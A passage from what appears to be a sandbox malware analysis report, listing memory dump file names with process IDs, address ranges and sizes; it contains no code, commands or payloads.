- memory/3508-313-0x00007FF9D1D50000-0x00007FF9D1D60000-memory.dmp (64KB)
- memory/3544-245-0x0000000000000000-mapping.dmp
- memory/3564-500-0x0000000000000000-mapping.dmp
- memory/3728-231-0x0000000000000000-mapping.dmp
- memory/3744-196-0x00007FF9F2FF0000-0x00007FF9F3AB1000-memory.dmp (10.8MB)
- memory/3744-198-0x00007FF9F2FF0000-0x00007FF9F3AB1000-memory.dmp (10.8MB)
- memory/3900-140-0x0000000000400000-0x0000000000405000-memory.dmp (20KB)
- memory/3900-133-0x0000000000000000-mapping.dmp
- memory/3900-134-0x0000000000400000-0x0000000000405000-memory.dmp (20KB)
- memory/3920-233-0x0000000000000000-mapping.dmp
- memory/3920-329-0x0000000000000000-mapping.dmp
- memory/4008-189-0x0000000000000000-mapping.dmp
- memory/4024-182-0x0000000000000000-mapping.dmp
- memory/4036-190-0x0000000000000000-mapping.dmp
- memory/4128-484-0x0000000000000000-mapping.dmp
- memory/4184-463-0x0000000000000000-mapping.dmp
- memory/4192-188-0x0000000000000000-mapping.dmp
- memory/4240-132-0x0000000000000000-mapping.dmp
- memory/4248-494-0x0000000000000000-mapping.dmp
- memory/4320-433-0x0000000000000000-mapping.dmp
- memory/4388-186-0x0000000000000000-mapping.dmp
- memory/4400-262-0x0000000140000000-0x0000000140029000-memory.dmp (164KB)
- memory/4400-260-0x0000000140002314-mapping.dmp
- memory/4400-259-0x0000000140000000-0x0000000140029000-memory.dmp (164KB)
- memory/4400-264-0x00007FFA104F0000-0x00007FFA105AE000-memory.dmp (760KB)
- memory/4400-263-0x00007FFA11CD0000-0x00007FFA11EC5000-memory.dmp (2.0MB)
- memory/4400-267-0x0000000140000000-0x0000000140029000-memory.dmp (164KB)
- memory/4440-454-0x0000000000000000-mapping.dmp
- memory/4460-247-0x00000000077D0000-0x0000000007CFC000-memory.dmp (5.2MB)
- memory/4460-239-0x00000000064C0000-0x00000000064DE000-memory.dmp (120KB)
- memory/4460-210-0x0000000005400000-0x000000000550A000-memory.dmp (1.0MB)
- memory/4460-211-0x0000000005330000-0x000000000536C000-memory.dmp (240KB)
- memory/4460-209-0x0000000002D70000-0x0000000002D82000-memory.dmp (72KB)
- memory/4460-208-0x0000000005910000-0x0000000005F28000-memory.dmp (6.1MB)
- memory/4460-201-0x0000000000400000-0x0000000000420000-memory.dmp (128KB)
- memory/4460-254-0x0000000007050000-0x00000000070A0000-memory.dmp (320KB)
- memory/4460-200-0x0000000000000000-mapping.dmp
- memory/4460-246-0x00000000070D0000-0x0000000007292000-memory.dmp (1.8MB)
- memory/4460-238-0x00000000061B0000-0x0000000006226000-memory.dmp (472KB)
- memory/4548-516-0x0000000000000000-mapping.dmp
- memory/4608-226-0x0000000000000000-mapping.dmp
- memory/4656-412-0x0000000000000000-mapping.dmp
- memory/4704-152-0x0000000007780000-0x000000000779A000-memory.dmp (104KB)
- memory/4704-146-0x0000000005E50000-0x0000000005EB6000-memory.dmp (408KB)
- memory/4704-151-0x0000000007DC0000-0x000000000843A000-memory.dmp (6.5MB)
- memory/4704-150-0x0000000006A10000-0x0000000006A2E000-memory.dmp (120KB)
memory/4704-158-0x0000000007B10000-0x0000000007B32000-memory.dmpFilesize
136KB
-
memory/4704-157-0x00000000079F0000-0x00000000079F8000-memory.dmpFilesize
32KB
-
memory/4704-149-0x0000000070B00000-0x0000000070B4C000-memory.dmpFilesize
304KB
-
memory/4704-148-0x0000000007610000-0x0000000007642000-memory.dmpFilesize
200KB
-
memory/4704-156-0x0000000007A00000-0x0000000007A1A000-memory.dmpFilesize
104KB
-
memory/4704-141-0x0000000000000000-mapping.dmp
-
memory/4704-147-0x0000000006460000-0x000000000647E000-memory.dmpFilesize
120KB
-
memory/4704-154-0x0000000007A40000-0x0000000007AD6000-memory.dmpFilesize
600KB
-
memory/4704-155-0x00000000079B0000-0x00000000079BE000-memory.dmpFilesize
56KB
-
memory/4704-142-0x0000000002E70000-0x0000000002EA6000-memory.dmpFilesize
216KB
-
memory/4704-145-0x0000000005D70000-0x0000000005DD6000-memory.dmpFilesize
408KB
-
memory/4704-144-0x0000000005590000-0x00000000055B2000-memory.dmpFilesize
136KB
-
memory/4704-159-0x00000000089F0000-0x0000000008F94000-memory.dmpFilesize
5.6MB
-
memory/4704-153-0x00000000077F0000-0x00000000077FA000-memory.dmpFilesize
40KB
-
memory/4704-143-0x00000000056D0000-0x0000000005CF8000-memory.dmpFilesize
6.2MB
-
memory/4712-437-0x0000000000000000-mapping.dmp
-
memory/4888-191-0x0000000000000000-mapping.dmp
-
memory/4912-197-0x0000000000000000-mapping.dmp
-
memory/4920-423-0x0000000000000000-mapping.dmp
-
memory/4976-249-0x0000026F5C610000-0x0000026F5C630000-memory.dmpFilesize
128KB
-
memory/4976-248-0x00007FF701612720-mapping.dmp
-
memory/4976-256-0x00007FF700E20000-0x00007FF701614000-memory.dmpFilesize
8.0MB
-
memory/4976-252-0x00007FF700E20000-0x00007FF701614000-memory.dmpFilesize
8.0MB
-
memory/4976-255-0x0000026F5D040000-0x0000026F5D060000-memory.dmpFilesize
128KB
-
memory/4992-342-0x0000000000000000-mapping.dmp
-
memory/5004-163-0x0000000000000000-mapping.dmp
-
memory/5028-244-0x00007FF737C914E0-mapping.dmp
-
memory/5036-227-0x0000000000000000-mapping.dmp
-
memory/5048-475-0x0000000000000000-mapping.dmp
-
memory/5048-346-0x0000000000000000-mapping.dmp
-
memory/5096-184-0x0000000000000000-mapping.dmp